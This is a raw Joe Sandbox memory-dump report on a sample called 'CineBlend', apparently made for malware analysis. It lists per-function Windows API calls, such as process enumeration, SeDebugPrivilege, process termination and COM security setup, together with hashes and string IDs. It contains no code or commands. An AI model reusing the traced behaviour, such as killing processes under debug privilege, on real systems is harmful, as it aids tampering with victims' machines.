                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: c296fa0521050b5ed182d25b811bc056d0e0e107885ccd0cb5ea477e35617b64
                                          • Instruction ID: e456164bf0b825008096171ac05ebae5cdb73b846f1b5e826d70aa2c4f7f88c7
                                          • Opcode Fuzzy Hash: c296fa0521050b5ed182d25b811bc056d0e0e107885ccd0cb5ea477e35617b64
                                          • Instruction Fuzzy Hash: 2C01BBB5241304BFE710AFA5DC4DF6B7BACEB89711F004412FA45EB2A1DA709800CB20
                                          APIs
                                            • Part of subcall function 00BADD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00BADDAC
                                            • Part of subcall function 00BADD87: Process32FirstW.KERNEL32(00000000,?), ref: 00BADDBA
                                            • Part of subcall function 00BADD87: CloseHandle.KERNELBASE(00000000), ref: 00BADE87
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCABCA
                                          • GetLastError.KERNEL32 ref: 00BCABDD
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCAC10
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCACC5
                                          • GetLastError.KERNEL32(00000000), ref: 00BCACD0
                                          • CloseHandle.KERNEL32(00000000), ref: 00BCAD21
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: a36afce877b28cee04355ec58abeb6862fa57efe4e1b78055579004b15a9419a
                                          • Instruction ID: dd32c7edeffc154f597b37c94fd2d0e4fa2ef8101fd71d9c98472f0e4a76ae78
                                          • Opcode Fuzzy Hash: a36afce877b28cee04355ec58abeb6862fa57efe4e1b78055579004b15a9419a
                                          • Instruction Fuzzy Hash: 6C618D74208245AFD310DF18C895F26BBE1EF54318F1584DCE4A68BBA2CB71ED45CB92
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BD43C1
                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00BD43D6
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BD43F0
                                          • _wcslen.LIBCMT ref: 00BD4435
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BD4462
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BD4490
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcslen
                                          • String ID: SysListView32
                                          • API String ID: 2147712094-78025650
                                          • Opcode ID: b32832a88b61b7777e1108f8f83a975cdd12bfada919c8736279d4359a22fae2
                                          • Instruction ID: b1233e9fcc86df18b743809f5e56f413c71f473621a3a28e17f4a92f0cbd30a2
                                          • Opcode Fuzzy Hash: b32832a88b61b7777e1108f8f83a975cdd12bfada919c8736279d4359a22fae2
                                          • Instruction Fuzzy Hash: FB41A171900209ABDF219F64CC45BEABBE9FB48360F100166F948E7291E7759990CB94
                                          APIs
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BAC6C4
                                          • IsMenu.USER32(00000000), ref: 00BAC6E4
                                          • CreatePopupMenu.USER32 ref: 00BAC71A
                                          • GetMenuItemCount.USER32(00C970E0), ref: 00BAC76B
                                          • InsertMenuItemW.USER32(00C970E0,?,00000001,00000030), ref: 00BAC793
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                          • String ID: 0$2
                                          • API String ID: 93392585-3793063076
                                          • Opcode ID: f657ae0dce2967b64a09ae0a187aa71948c31c5ae5ed1d206e202e234333a8ae
                                          • Instruction ID: 4775490cc380fb94910f314d432a9b7a4ebea33b1903c7debb18d85ad4cb00a1
                                          • Opcode Fuzzy Hash: f657ae0dce2967b64a09ae0a187aa71948c31c5ae5ed1d206e202e234333a8ae
                                          • Instruction Fuzzy Hash: 6B51BE706082059BDF11CF68D9C4BAEBFF8EF56314F24429AE812A7291E7709D40CF61
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00BAD1BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 820e2a953824bb1f4f89a730390f700527bf07e08b1554b50701adcbd12f4bec
                                          • Instruction ID: d0ad4e02911eb80059ad4a9b84030cc219e7b71dc5744b5fd6b661fd25e359a0
                                          • Opcode Fuzzy Hash: 820e2a953824bb1f4f89a730390f700527bf07e08b1554b50701adcbd12f4bec
                                          • Instruction Fuzzy Hash: 4F11DA35A4C706BAE7055F58DCC2DAE77DCDF06B60B2001BAF502B65C1EBB46E408561
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 642191829-3771769585
                                          • Opcode ID: e569af38be95eaaa333623a846fda7090ce4f67e45a24a43a2cbdb825b3c2d16
                                          • Instruction ID: 401b3f8e416f61af81b0495872eb2d3859182526a50fe78dea1ae1b4b83f4df0
                                          • Opcode Fuzzy Hash: e569af38be95eaaa333623a846fda7090ce4f67e45a24a43a2cbdb825b3c2d16
                                          • Instruction Fuzzy Hash: C111DF31909115BBCB20AB60DC4AEEE77ECEF02710F0000E6F555A6091FF78DE81DA60
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$LocalTime
                                          • String ID:
                                          • API String ID: 952045576-0
                                          • Opcode ID: c4b54010210959e40d585b9ff9e40a218a6a3227466ca7b2eea6f5dfb36d6cfc
                                          • Instruction ID: 968e36c2fffa3c6b1d778a0aad8fc5c9bff4cd4ecb7dc81318754a9ed6e19888
                                          • Opcode Fuzzy Hash: c4b54010210959e40d585b9ff9e40a218a6a3227466ca7b2eea6f5dfb36d6cfc
                                          • Instruction Fuzzy Hash: 2C419466D11515B5CB11EBF8CC86ADFB7E8EF05310F5084A2E518E3121FB38D665C3A6
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00B5FC41
                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00B9FC15
                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00B9FC98
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 05b4cfabe917cffb4f748f55290e88027c30e88728ae17877b73ef774586eaca
                                          • Instruction ID: e1c9e870f791bf5cd98959451814031010bce0d206b45b30cbb6418b01ee0d9c
                                          • Opcode Fuzzy Hash: 05b4cfabe917cffb4f748f55290e88027c30e88728ae17877b73ef774586eaca
                                          • Instruction Fuzzy Hash: 46411B3010938A9ACF358B3C89D877AFBE1EB46312F1444FDED4687964D671A848C710
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00BD37B7
                                          • GetDC.USER32(00000000), ref: 00BD37BF
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD37CA
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00BD37D6
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BD3812
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD3823
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BD6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00BD385E
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BD387D
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 37638f16b36bc0f2a45b4b1ac43636d1bb3fa73628ac4a1eb5b165d8d5bbb854
                                          • Instruction ID: 5f70e8ac7ed4ef9e9906e586044d38d8048a70bd385bf6e8f8e059fffd53c7f0
                                          • Opcode Fuzzy Hash: 37638f16b36bc0f2a45b4b1ac43636d1bb3fa73628ac4a1eb5b165d8d5bbb854
                                          • Instruction Fuzzy Hash: 2931BF72201214BFEB154F50DC99FEB7BADEF49711F0400A6FE489B291EAB59C41C7A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: d8bb0daa86b19bd4d29999e4558cc8aaf5308ee17ad5783ed847ed0761a8a17c
                                          • Instruction ID: 5e313527e9d7b98f61b04f5b8696a05f15681048b47920b5700bd30cf7bd60c2
                                          • Opcode Fuzzy Hash: d8bb0daa86b19bd4d29999e4558cc8aaf5308ee17ad5783ed847ed0761a8a17c
                                          • Instruction Fuzzy Hash: D7D18071A0070A9FDB20DF58C885FAEB7F5EB48344F1485ADE916AB281D770AD85CB50
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00B8194E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B819D1
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00B81B7B,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B81A64
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B81A7B
                                            • Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B81AF7
                                          • __freea.LIBCMT ref: 00B81B22
                                          • __freea.LIBCMT ref: 00B81B2E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 2829977744-0
                                          • Opcode ID: 937fcc9ae952466f7fc9d8688b3e1cb426ff975afdc4bd024bb0467aa44b2e91
                                          • Instruction ID: 8d427194deb682495746f253f6c25a0afc46b98ee250493603b4df4b81d3ba65
                                          • Opcode Fuzzy Hash: 937fcc9ae952466f7fc9d8688b3e1cb426ff975afdc4bd024bb0467aa44b2e91
                                          • Instruction Fuzzy Hash: 6C91D571E022169ADB24AE6CC891EEEBBFDDF09710F180A99E815E7160E735DC43C760
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2610073882-625585964
                                          • Opcode ID: 163df94c6cd1ec59824e74283792b691e0af8fdf0c5864b3a94f8d5d7e90f38c
                                          • Instruction ID: cd84e76c104fdeffb51fbc43664f46c80465997493a9c0dae2dccc6f9b2078de
                                          • Opcode Fuzzy Hash: 163df94c6cd1ec59824e74283792b691e0af8fdf0c5864b3a94f8d5d7e90f38c
                                          • Instruction Fuzzy Hash: 64916F71A00615ABDF208FA5CC88FAEBBF8EF45714F14859DF515AB280D770A985CFA0
                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00BB1C1B
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1C43
                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00BB1C67
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1C97
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1D1E
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1D83
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1DEF
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                          • String ID:
                                          • API String ID: 2550207440-0
                                          • Opcode ID: 43e48b34a98df2424a17a33b8564b83a59e20b550da90598cbd253aaed9f87ae
                                          • Instruction ID: f3d2a258423e671747816164913f3581579402963be481cc50e5d70e7f492a83
                                          • Opcode Fuzzy Hash: 43e48b34a98df2424a17a33b8564b83a59e20b550da90598cbd253aaed9f87ae
                                          • Instruction Fuzzy Hash: B391BF72A002199FDB019F98C8A5BFEBBF4FF05711F5488A9E950EB291D7B4E940CB50
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: f78388a5f11a532bc347edcab6a91d55654a4824c8431af9be3c620a25424239
                                          • Instruction ID: cbceebdf170407cd7adea3554f2c50be3b06bc9cb4bca2d2214f6f815e344674
                                          • Opcode Fuzzy Hash: f78388a5f11a532bc347edcab6a91d55654a4824c8431af9be3c620a25424239
                                          • Instruction Fuzzy Hash: 1A914A75D40219AFCB10CFA9CC84AEEBBF8FF48720F148595E911B7251D7749A81DB60
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00BC43C8
                                          • CharUpperBuffW.USER32(?,?), ref: 00BC44D7
                                          • _wcslen.LIBCMT ref: 00BC44E7
                                          • VariantClear.OLEAUT32(?), ref: 00BC467C
                                            • Part of subcall function 00BB169E: VariantInit.OLEAUT32(00000000), ref: 00BB16DE
                                            • Part of subcall function 00BB169E: VariantCopy.OLEAUT32(?,?), ref: 00BB16E7
                                            • Part of subcall function 00BB169E: VariantClear.OLEAUT32(?), ref: 00BB16F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4137639002-1221869570
                                          • Opcode ID: 35917562009906088bcc782e13396321e6bd91f449302e7a9f886dd2c7d65861
                                          • Instruction ID: 9ec366c063e2173d636504901d8792fd8f39e81e58f161e275de40e7d48480fb
                                          • Opcode Fuzzy Hash: 35917562009906088bcc782e13396321e6bd91f449302e7a9f886dd2c7d65861
                                          • Instruction Fuzzy Hash: 7F914975A083019FC714EF24C490A6AB7E5FF89714F1489ADF8899B351DB31EE06CB92
                                          APIs
                                            • Part of subcall function 00BA08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?,?,00BA0C4E), ref: 00BA091B
                                            • Part of subcall function 00BA08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0936
                                            • Part of subcall function 00BA08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0944
                                            • Part of subcall function 00BA08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?), ref: 00BA0954
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00BC56AE
                                          • _wcslen.LIBCMT ref: 00BC57B6
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00BC582C
                                          • CoTaskMemFree.OLE32(?), ref: 00BC5837
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 614568839-2785691316
                                          • Opcode ID: 36a08411e4abf71d39e992187589007e49c1a7bcc17f3cdac91479408347a807
                                          • Instruction ID: 4366ba8345b109b5cf0aa12ab3990d20c48ff8acf8e27a5aa2e51eebb57379d0
                                          • Opcode Fuzzy Hash: 36a08411e4abf71d39e992187589007e49c1a7bcc17f3cdac91479408347a807
                                          • Instruction Fuzzy Hash: A491F671D00619AFDF24DFA4D881EEEB7F9AF08304F1045AAE915A7251EB70AA44DF60
                                          APIs
                                          • GetMenu.USER32(?), ref: 00BD2C1F
                                          • GetMenuItemCount.USER32(00000000), ref: 00BD2C51
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BD2C79
                                          • _wcslen.LIBCMT ref: 00BD2CAF
                                          • GetMenuItemID.USER32(?,?), ref: 00BD2CE9
                                          • GetSubMenu.USER32(?,?), ref: 00BD2CF7
